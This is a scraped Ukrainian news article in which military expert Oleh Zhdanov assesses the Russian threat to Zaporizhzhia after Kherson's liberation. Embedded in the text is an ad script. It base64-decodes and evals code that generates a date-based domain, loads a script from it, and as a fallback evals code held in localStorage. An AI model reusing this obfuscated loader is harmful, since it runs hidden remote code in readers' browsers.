Експерт оцінив загрозу наступу рф на Запоріжжя після звільнення ЗСУ Херсону

Військовий експерт Олег Жданов дав оцінку загрозі наступу рф на Запоріжжя після деокупації Херсону та пояснив, чому правий берег має стратегічне значення для російських окупантів. Також, він назвав важливість знищення правобережного угруповання ворога.

Про це інформує Акцент з посиланням на етер телемарафону FREEDOM.

Як вже повідомляв Акцент, за інформацією британської розвідки МІ-6, контранступ України на Херсонщині набирає обертів: ЗСУ, швидше за все, встановили плацдарм на південь від річки Інгулець, яка утворює північний кордон окупованої Росією території. Україна використала свою нову далекобійну артилерію, щоб пошкодити щонайменше три мости через Дніпро, від яких залежить постачання Росією територій, що знаходяться під її контролем.

Контрнаступ на Херсонщині набирає обертів: де просунулися ЗСУ за останній час (КАРТА) Чи є загроза наступу рф на Запоріжжя?

На думку військового експерта та полковника запасу ЗСУ Олег Жданова, правобережне угруповання ворога після деокупації Херсонщини не буде представляти великої загрози для запорізького напрямку.

«Не представлятиме великої загрози це угруповання (російських окупантів — ред.): навіть якщо вони встигнуть вивести особовий склад, ми видавимо його за Дніпро на лівий берег і особовий склад піде на човнах. (…) Мостів немає, щоб вивести техніку та озброєння — ось у чому проблема Тому вона не буде являти собою такої великої військової загрози. А з урахуванням того, що ми їх потріпаємо дуже сильно і деморалізація особового складу — я не думаю, що вони вдруге погодяться піти в бій. Та й з якою технікою», — наголосив експерт. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Також, раніше експерт висловлював думку стосовно значущості правого берегу для рф: так, на його думку, для країни-агресорки він має стратегічне значення.

«Якщо ми знищимо правобережне угруповання, то ми перекриваємо Крим, а з ним і потік техніки та особового складу з Росії. Беремо під вогневий контроль залізничну гілку на Запоріжжі, беремо під вогневий контроль Мелітополь, і тоді Запорізький напрямок починає дуже сильно просідати. З появою ATACMS ми знищуємо Кримський міст і тим самим повертаємо йому знову статус півострова», — сказав експерт.

Як раніше повідомляв Акцент, військовий експерт і полковник запасу ЗСУ Олег Жданов дав оцінку ситуації на запорізькому напрямку: він також назвав наслідки знищення українськими партизанами залізничного мосту в районі Мелітополя для логістики рашистів. (adsbygoogle = window.adsbygoogle || []).push({});

Експерт оцінив стан на Запоріжжі і назвав наслідки знищення залізничного мосту для рф (КАРТА) Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/ekspert-otsiniv-zagrozu-nastupu-rf-na-zaporizhzhya-pislya-zvilnennya-zsu-hersonu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top